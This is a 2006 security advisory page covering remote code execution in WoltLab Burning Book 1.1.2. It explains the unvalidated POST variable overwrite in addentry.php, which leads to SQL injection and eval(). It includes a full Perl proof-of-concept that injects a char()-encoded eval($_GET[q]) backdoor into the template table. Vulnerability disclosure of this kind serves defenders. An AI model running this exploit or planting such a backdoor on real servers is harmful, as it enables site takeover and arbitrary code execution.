|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1774 CVE : CVE-2006-5509 CVE : CVE-2006-5508 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : ShAnKaR Published : 27.10.2006
Advisory Content : Hello bugtraq, ShAnKaR (sec at shankar.antichat.ru ) reports multiple vulnerabilities in WoltLab Burning Book. Original message in Russian is available from http://www.security.nnov.ru/Odocument711.html Short translation: Author: ShAnKaR (sec at shankar.antichat.ru) Vendor: woltlab.de Tested version: WoltLab Burning Book 1.1.2 Level: Critical Class: Remote code execution addentry.php file contains this code: while(list($key,$val)=each($_POST)) { $$key=$val; } There is no validation for variable names sent with POST request, so, it's possible to overwrite system variables. E.g. here: $db->query("INSERT INTO bgb".$n."_posts (iconid,authorname,posttime,message,nosmilies,emai l,homepage,icq,aim,yim,msn,ipaddress,useragent,vis ible) VALUES ('".intval($iconid)."','".addslashes($name)."',".time().",'".addslashes( $message)."','".intval($nosmilies)."','".addslashes($email)."','".addsla shes($homepage)."','".intval($icq)."','".addslashes($aim)."','".addslash es($yim)."','".addslashes($msn)."','". $REMOTE_ADDR."','".$HTTP_USER_AGENT."','".(($moderateposts) ? ("0") : ("1"))."')"); it's possible to add any data to database, and later this data can be executed as a PHP code: eval("$template->output("".$template->get("index")."");"); Exploit code (burning_book.pl): #!/usr/bin/perl # woltlab.de burning book <=1.1.2 SQL and PHP injection PoC # use /index.php?q=phpinfo();exit; # ShAnKaR sec[A]shankar.antichat.ru # http://antichat.ru/ use LWP; die("use ./burn-book.pl http://localhost/wbbook/ [1(number book db, default `1`)]n") if !$ARGV[0];$ARGV[1]='' if !$ARGV[1]; my $ua=LWP::UserAgent->new(); $ua->post($ARGV[0].'/addentry.php',[reg_image=>0,send=>'send',name=>1,me ssage=>1, n=>$ARGV[1].'_templates (`templateid`,`templatename`,`template`) VALUES (char(55,55,55),char(105,110,100,101,120,95,102,105,101,108,100,115),cha r(92,34,59,64,101,118,97,108,40,36,95,71,69,84,91,113,93,41,59,36,102,10 5,101,108,100,115,61,92,34,60,98,114,32,47,62,60,117,62,36,102,105,101,1 08,100,116,105,116,108,101,60,47,117,62,58,32,36,102,105,101,108,100))/* ',]); -- /3APA3A http://security.nnov.ru/  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |